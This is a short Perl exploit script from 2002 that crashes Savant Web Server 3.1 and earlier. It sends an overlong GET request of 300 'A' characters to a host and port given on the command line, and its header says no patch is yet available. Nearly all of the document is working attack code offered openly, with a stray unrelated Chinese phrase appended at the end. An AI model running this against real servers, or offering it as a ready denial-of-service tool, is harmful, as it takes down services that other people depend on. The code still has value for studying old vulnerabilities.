#!/usr/bin/perl # Remote / Local buffer overflow for Savant Web Server 3.1 and previous # As Described in the follow advisory FS Advisory ID: 091002-SVWS # Crashes the daemon, no patch is yet available for this. 11th sept 02 # Author: ntfx # Soldierx Security / Legion2000SR (c) # Web: Soldierx.com # Web: legion2000.security.nu ############################ use IO::Socket; # THIS CODE IS A TOY, AN EXAMPLE. NOT SERIOUS. $host=$ARGV[0]; $port=$ARGV[1]; $a=A; # kat <3 if(! $ARGV[0]) { &usage; exit; } $dosme = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => 'tcp'); $evilc0de = $a x 300; print $dosme "GET /$evilc0de\n"; sleep(3); close($dosme); print "Daemon should now be crashed"; sub usage() { print "USAGE: perl $0 \n"; print "Savant Web Server 3.1 Buffer Overflow\n"; print "Legion2000SR http://legion2000.security.nu\n"; print "SoldierX Security http://soldierx.com\n"; exit(0); }

亚洲欧美在线